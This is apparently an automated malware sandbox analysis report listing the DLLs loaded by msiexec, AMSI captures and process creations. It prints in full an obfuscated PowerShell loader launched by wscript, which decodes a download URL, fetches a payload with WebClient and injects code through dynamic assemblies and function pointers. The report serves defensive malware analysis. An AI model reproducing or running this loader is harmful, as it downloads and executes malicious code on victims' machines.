              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: CallSite.Targetore.pdbh source: powershell.exe, 00000003.00000002.2045907923.0000000007015000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb0 source: powershell.exe, 00000003.00000002.2045907923.0000000007015000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.2045907923.0000000006FDD000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("Powershell.exe", "" <#slagtstavles Talepdagogs Regnskabsa", "", "", "0");
              Source: Yara matchFile source: 00000003.00000002.2058610754.0000000008C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2058181579.00000000083B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2039511100.00000000057BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1898960358.00000112F5F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64string($Aftjenes)$glObal:boOTtop = [sYsTem.Text.eNcoDiNG]::AsCiI.gETsTriNg($sILDEbenssTRIbet)$gLObAL:BomuLDsGaRnEt=$BOOtTOP.subsTRing($blIps,$nomiNalIsInG)<#Schismatical Justicoat Rammel Spo
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Besmykket $reddlemen $Bulbourethral), (Nonvitrified @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Splined = [AppDomain]::CurrentDomain.GetAssemblies()$gl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Hortensierne)), $Agerhnsndretningsarkitekten).DefineDynamicModule($Sprogblomsts, $false).DefineType($Infiksformerne, $Airbusses, [Syst
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64string($Aftjenes)$glObal:boOTtop = [sYsTem.Text.eNcoDiNG]::AsCiI.gETsTriNg($sILDEbenssTRIbet)$gLObAL:BomuLDsGaRnEt=$BOOtTOP.subsTRing($blIps,$nomiNalIsInG)<#Schismatical Justicoat Rammel Spo
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvje
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvje
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvjeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,10_2_004044A4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7EA711 push eax; iretd 1_2_00007FFD9B7EA731
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7E00AD pushad ; iretd 1_2_00007FFD9B7E00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8B7B16 push ebp; ret 1_2_00007FFD9B8B7B9A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8BB1F7 push ds; ret 1_2_00007FFD9B8BB1F8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8B79C5 push ebp; ret 1_2_00007FFD9B8B79C8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8B7F4E push ecx; ret 1_2_00007FFD9B8B7F50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04463727 push eax; iretd 3_2_04463761
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08B63BE5 push cs; iretd 3_2_08B63BE6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08B60D85 push es; iretd 3_2_08B60DA3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08B640D9 push cs; ret 3_2_08B640DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08B6004B push edx; iretd 3_2_08B6004C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08B641DE push EB73DDCBh; ret 3_2_08B641E5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08B603BB push 95470BA8h; ret 3_2_08B603C6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08B646F6 push edx; iretd 3_2_08B64701
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FC72806 push ecx; ret 8_2_1FC72819
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03B903BB push 95470BA8h; ret 8_2_03B903C6
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03B93BE5 push cs; iretd 8_2_03B93BE6
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03B946F6 push edx; iretd 8_2_03B94701
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03B90D85 push es; iretd 8_2_03B90DA3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03B941DE push EB73DDCBh; ret 8_2_03B941E5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03B940D9 push cs; ret 8_2_03B940DA
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_03B9004B push edx; iretd 8_2_03B9004C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044693D push ecx; ret 10_2_0044694D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DB84
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DBAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00451D54 push eax; ret 10_2_00451D61
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00444E71 push ecx; ret 12_2_00444E81
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00414060 push eax; ret 13_2_00414074
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00414060 push eax; ret 13_2_0041409C

              Boot Survival

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnKuvkQuan AuiCoanMelg ereThenHul=Skr(Opd$FriT C mFustOm e.un B.n- HaoRedrUpr Off$HosWkbeaRe rBasbBjelC,eeC rl Vii C,kAfse vr).rv ')Fusionsdokumentet (Drunkometer ' nt$Ro g TalSikoSpnbUn a etlPa : scLDisipirmtopbb si BreFles,trt K = aa$LyseSmunZonvGr :U fuHa,sBeee Rer Cop dgrS so Scf ,oit,rl Rue ff ')if($Blodsnkningen){ $Chemotherapeutics93=[char]34+$Udfrt+[char]34Fusionsdokumentet (Drunkometer ' ek$Ov.gTaklC toFrebLovaHjelEle:Brer Ada ComBrohFu.eChaaAktdSp,=cos[ GeTT.nyAfspSo,eF s]Men: re:RutGpeneBo,tdroTMagyTe.pDybe.anFungr.phoKo.mS rCUniLSubS CaIDioDP c(God$PosU inR,sbNonlCoriRevgkn.h S tScreDisdB.rlH ly ev)Reg ')Fusionsdokumentet (Drunkometer ' eg$ S,gAcclTa o Opb GoaRivlGlo:Es D Tei,yms ,ot FiaMarn Rec yneP,srirriEasnTidg at1dam8Or 1Ink=Stv[C rS Fay LbsSpatHvdeKlnm Vo.IndAef.cRt.tKooi UlvUmbaHistAr o S rTyn]Ana:Fis:He C A.rMure T a Pit .neOccISl.nUnesHestC,laF,rnCn cDene b(Har$SparSala,namMidhLameSe aMaxdRec)Eks ')Fusionsdokumentet (Drunkometer ' De$De.gAu.lF lo prb UdaPrjlBel:F rSTant beoS nrmalcHediasirMi.kRepl B esp rnykn obe ros ci Co= u J $b bD Bei VisPastPhoaCorn Sac leNumrspiiHennRifg od1 Re8Kor1.en. nI ott oseI,fmO d( R )sim ')if (!$Storcirklernes) {$Storcirklernes = $Distancering181.Item(0)}Fusionsdokumentet (Drunkometer 'Ser$De StoltBreo nvrAf.c k.i,nbrDick M,lGreeDedrCornMileMo sMon. nDBruoU scM ru om Wie ytnU,stBas.OmlATr p repSldlC riO dc waaJantStoiHaeoCycnFla. BaSTyphCore SylR.vlFalERepxTriePrac oiuDistOpteSup(Tra$ ReW BaaOx lTu lRnteOmrr Of,Kun$SteCButh eceAllmPr.oMu tXa.h cef rrP saChapStveOveu G tColi U.csuksSlg9Bog3Vgg, Ja$,lyL itiSh mNurb.ami neeBomsToutSku,Cou$K,nn euExalPomlDis,Le 0kic)Kla ')Fusionsdokumentet $ledelsesfunktionen}function Ulfhild ($Flagellationernes,$Hessian) {#Terminational Torskegilderne Bregnerod Omrystningers Folkekongresser Sanitrt topforhandlingerne Gteskabsbruddet Studieegnet Outquery Fusionsdokumentet (Drunkometer 'Sup$ResFKl.l raLeigMaleLiml ekl praskutSkdiTvaoNeunud e CorPrvn Anemons ik ol-PerbSttxNonoSter Re Unp$SluHHileUnesTopsUljiTaiaRugnBer ')#immunoelectrophoresis Kunstskjtelb Baadsmandspibens cerebropsychosis mastoiditis Preadornment Ozons Revibrational Unsweetness Murrain Alilonghi Underburned Vejvsenets Blokaders Bipods Computerbranchens Firevortex Garderobenumrene Vikledes Apokalypsens Saudiere Faktoranalyse Nonimmigration Birching Penalizes Regressions Turbinelike }#Jagttilladelserne Almswomen Sporingsstationens Bialis Optagelseskriteriets Sternway Driftsforstyrrelsers Dirigerende Lseplaners Amphistomatic Hjemfarnes Danmarksbilledernes Blresmlden Skambid Pensionrs Kriminalkommissrers Afgangsperrons Bararite afstemningsformen Semisevere Unevasively Brofogden Marselisborg flled marskernes lgmnds Function Meningsbaerende ($Sickishly, $Ufornuftigst = 0){$Whippable=2Fusionsdokumentet (Drunkometer 'udd$.rug SplW.so ,sbStyaM.tlalt:TraB Syu yrk ove ImtBoyrcogoIsts SaeEx Pr=K,e P eNTh.eAccwB.o-ArnOSagb V.jPleeRescPh,t An DobFasy.odtMeleReh[Ca ]lte .i(Smu$UnhSBezi DecReakC.li
